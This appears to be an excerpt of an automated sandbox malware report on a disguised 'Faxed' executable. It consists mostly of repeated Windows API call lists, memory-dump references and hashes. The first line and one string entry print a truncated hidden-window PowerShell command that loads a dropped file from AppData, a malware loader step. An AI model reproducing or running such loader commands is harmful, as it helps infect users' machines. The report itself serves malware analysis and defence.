                                                                                              • powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$T, xrefs: 00404ACE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: : Completed$A$C:\Users\user\AppData\Roaming\floddeltaers$H7B$powershell.exe -windowstyle hidden "$hjhedens=gc -Raw 'C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes\Thionylamine.asf';$T
                                                                                              • API String ID: 2624150263-1704733976
                                                                                              • Opcode ID: 667bbe0a30595837a03e9c6ce466c2f6c83f7bc5ead90454ae6c6de6e9a81711
                                                                                              • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                              • Opcode Fuzzy Hash: 667bbe0a30595837a03e9c6ce466c2f6c83f7bc5ead90454ae6c6de6e9a81711
                                                                                              • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                                              APIs
                                                                                              • DeleteFileW.KERNEL32(?,?,74DF3420,74DF2EE0,00000000), ref: 00405D9D
                                                                                              • lstrcatW.KERNEL32(00425750,\*.*,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405DE5
                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405E08
                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405E0E
                                                                                              • FindFirstFileW.KERNEL32(00425750,?,?,?,0040A014,?,00425750,?,?,74DF3420,74DF2EE0,00000000), ref: 00405E1E
                                                                                              • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EBE
                                                                                              • FindClose.KERNEL32(00000000), ref: 00405ECD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                              • String ID: .$.$PWB$\*.*
                                                                                              • API String ID: 2035342205-2468439962
                                                                                              • Opcode ID: 88231b11ec98eaa9df7b473069ad492fae481747da6a56d0a8b7996e1ca68de6
                                                                                              • Instruction ID: 3801e3340fbbb9c460ab277ab089a7ece50ce31247a5b640c745bca9484d7288
                                                                                              • Opcode Fuzzy Hash: 88231b11ec98eaa9df7b473069ad492fae481747da6a56d0a8b7996e1ca68de6
                                                                                              • Instruction Fuzzy Hash: 46410330800A15AADB21AB61CC49BBF7678EF41715F50413FF881711D1DB7C4A82CEAE
                                                                                              APIs
                                                                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes, xrefs: 00402269
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateInstance
                                                                                              • String ID: C:\Users\user\AppData\Roaming\floddeltaers\Epopeernes
                                                                                              • API String ID: 542301482-3326558002
                                                                                              • Opcode ID: ee1c6ff8c6b65b877d0cdf2133b8a318e52ea7264990c1087aa8c247d69266e9
                                                                                              • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                                                                                              • Opcode Fuzzy Hash: ee1c6ff8c6b65b877d0cdf2133b8a318e52ea7264990c1087aa8c247d69266e9
                                                                                              • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                                                                                              APIs
                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileFindFirst
                                                                                              • String ID:
                                                                                              • API String ID: 1974802433-0
                                                                                              • Opcode ID: 67550a67c3a2e57dc20853785104a177dfb3c99215c54008fbb9f27bde2b9ba1
                                                                                              • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                                                              • Opcode Fuzzy Hash: 67550a67c3a2e57dc20853785104a177dfb3c99215c54008fbb9f27bde2b9ba1
                                                                                              • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00405049
                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00405054
                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 004050B5
                                                                                              • SetWindowLongW.USER32(?,000000FC,0040563E), ref: 004050CE
                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                                                              • DeleteObject.GDI32(00000000), ref: 0040512B
                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                                                                • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040527D
                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                                                              • GlobalFree.KERNEL32(?), ref: 0040546B
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                                                              • ShowWindow.USER32(?,00000000), ref: 00405615
                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405620
                                                                                              • ShowWindow.USER32(00000000), ref: 00405627
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N
                                                                                              • API String ID: 2564846305-813528018
                                                                                              • Opcode ID: 950969970af6d10ef62121ad67a768569704eb6391eae900e1ce4f9d1827afee
                                                                                              • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                                                              • Opcode Fuzzy Hash: 950969970af6d10ef62121ad67a768569704eb6391eae900e1ce4f9d1827afee
                                                                                              • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                                                              APIs
                                                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                                                              • GetSysColor.USER32(?), ref: 00404863
                                                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                                                              • lstrlenW.KERNEL32(?), ref: 00404884
                                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                                                              • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                                                                              • SendMessageW.USER32(00000000), ref: 00404906
                                                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                                                              • SetCursor.USER32(00000000), ref: 00404985
                                                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                                                              • SetCursor.USER32(00000000), ref: 004049A1
                                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                              • String ID: : Completed$N
                                                                                              • API String ID: 3103080414-2140067464
                                                                                              • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                              • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                                                              • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                                                              • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                                                              APIs
                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                                                              • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2
                                                                                                • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                                • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                              • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
                                                                                              • wsprintfA.USER32 ref: 0040632D
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                                                              • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406416
                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                                                                • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe,80000000,00000003), ref: 0040615C
                                                                                                • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                              • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                                                              • API String ID: 2171350718-2295842750
                                                                                              • Opcode ID: 07ea5d3dd502240bf86d0c298f94c43ad2335bec49c481c59c36197298e6ebad
                                                                                              • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                                                              • Opcode Fuzzy Hash: 07ea5d3dd502240bf86d0c298f94c43ad2335bec49c481c59c36197298e6ebad
                                                                                              • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                                                              APIs
                                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                              • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                              • String ID: F
                                                                                              • API String ID: 941294808-1304234792
                                                                                              • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                              • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                                                              • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                                                              • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                                                              APIs
                                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                                                              • GetSysColor.USER32(00000000), ref: 00404686
                                                                                              • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                                                              • SetBkMode.GDI32(?,?), ref: 0040469E
                                                                                              • GetSysColor.USER32(?), ref: 004046B1
                                                                                              • SetBkColor.GDI32(?,?), ref: 004046C1
                                                                                              • DeleteObject.GDI32(?), ref: 004046DB
                                                                                              • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
